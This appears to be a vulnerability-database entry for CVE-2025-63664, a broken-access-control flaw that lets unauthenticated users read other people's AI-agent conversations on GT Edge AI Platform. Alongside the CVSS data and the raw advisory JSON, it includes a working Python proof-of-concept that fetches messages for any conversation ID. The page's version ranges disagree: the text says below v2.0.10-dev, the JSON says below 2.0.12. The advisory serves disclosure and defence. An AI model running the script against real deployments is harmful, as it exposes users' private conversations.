Security Vulnerability Report
中文
CVE-2025-63664 CVSS 7.5 HIGH

CVE-2025-63664

Published: 2025-12-22 19:15:50
Last Modified: 2026-01-05 17:35:50

Description

Incorrect access control in the /api/v1/conversations/*/messages API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access other users' message history with AI agents.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:* - VULNERABLE
GT Edge AI Platform < v2.0.10-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63664 PoC - GT Edge AI Platform Unauthorized Access # Target: /api/v1/conversations/*/messages API def exploit(target_url, conversation_id): """ Exploit for CVE-2025-63664 Attempts to access messages from a specific conversation ID """ endpoint = f"{target_url}/api/v1/conversations/{conversation_id}/messages" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "application/json" } try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] SUCCESS: Retrieved messages for conversation {conversation_id}") print(f"Response: {response.json()}") return True elif response.status_code == 403: print(f"[-] Access Denied for conversation {conversation_id}") else: print(f"[-] Unexpected response: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <conversation_id>") print(f"Example: python {sys.argv[0]} https://gt-edge-ai.example.com 12345") sys.exit(1) target = sys.argv[1] conv_id = sys.argv[2] print(f"[*] Exploiting CVE-2025-63664 on {target}") print(f"[*] Target conversation ID: {conv_id}") exploit(target, conv_id) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63664", "sourceIdentifier": "[email protected]", "published": "2025-12-22T19:15:49.513", "lastModified": "2026-01-05T17:35:50.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the /api/v1/conversations/*/messages API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access other users' message history with AI agents."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:*", "versionEndExcluding": "2.0.12", "matchCriteriaId": "B5535437-227D-49B8-A0E1-D5A8585D8BF3"}]}]}], "references": [{"url": "https://gist.github.com/p80n-sec/0a0a71a2190d5e6f8083bf6069e7b5f2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending", "source": "[email protected]", "tags": ["Broken Link"]}]}}